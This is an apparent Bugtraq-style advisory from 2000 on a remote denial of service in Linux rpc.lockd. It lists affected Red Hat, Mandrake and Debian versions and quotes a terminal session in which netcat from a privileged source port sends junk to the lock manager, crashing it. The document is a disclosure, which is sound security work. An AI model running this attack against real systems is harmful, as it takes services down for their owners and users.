Linux rpc.lockd Remote Denial Of Service Vulnerability

Bugtraq ID:	1372
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Jun 08 2000 12:00AM
Updated:	Jun 08 2000 12:00AM
Credit:	This vulnerability was posted to the Bugtraq mailing list on June 8, 2000 by Mike Murray <[email protected]>
Vulnerable:	Redhat Linux 6.2 sparc Redhat Linux 6.2 i386 Redhat Linux 6.2 alpha Redhat Linux 6.1 sparc Redhat Linux 6.1 i386 Redhat Linux 6.1 alpha Redhat Linux 6.0 sparc Redhat Linux 6.0 alpha Redhat Linux 6.0 Mandriva Linux Mandrake 7.0 Mandriva Linux Mandrake 6.1 Mandriva Linux Mandrake 6.0 Debian Linux 2.2 pre potato Debian Linux 2.2 Debian Linux 2.1
Not Vulnerable:

Linux rpc.lockd Remote Denial Of Service Vulnerability

From the Bugtraq post by Mike Murray:

[root@hiro /]# rpcinfo -p target
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100021 1 tcp 1024 nlockmgr
100021 3 tcp 1024 nlockmgr
100024 1 udp 831 status
100024 1 tcp 833 status
[root@hiro /]# nc -p 1000 target 1024
alksdjfalskdjfsdafs
Here, I issued a Ctrl-C to get out of netcat, and got:
punt!
[root@hiro /]#
[root@hiro /]# rpcinfo -p target
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 831 status
100024 1 tcp 833 status
[root@hiro /]#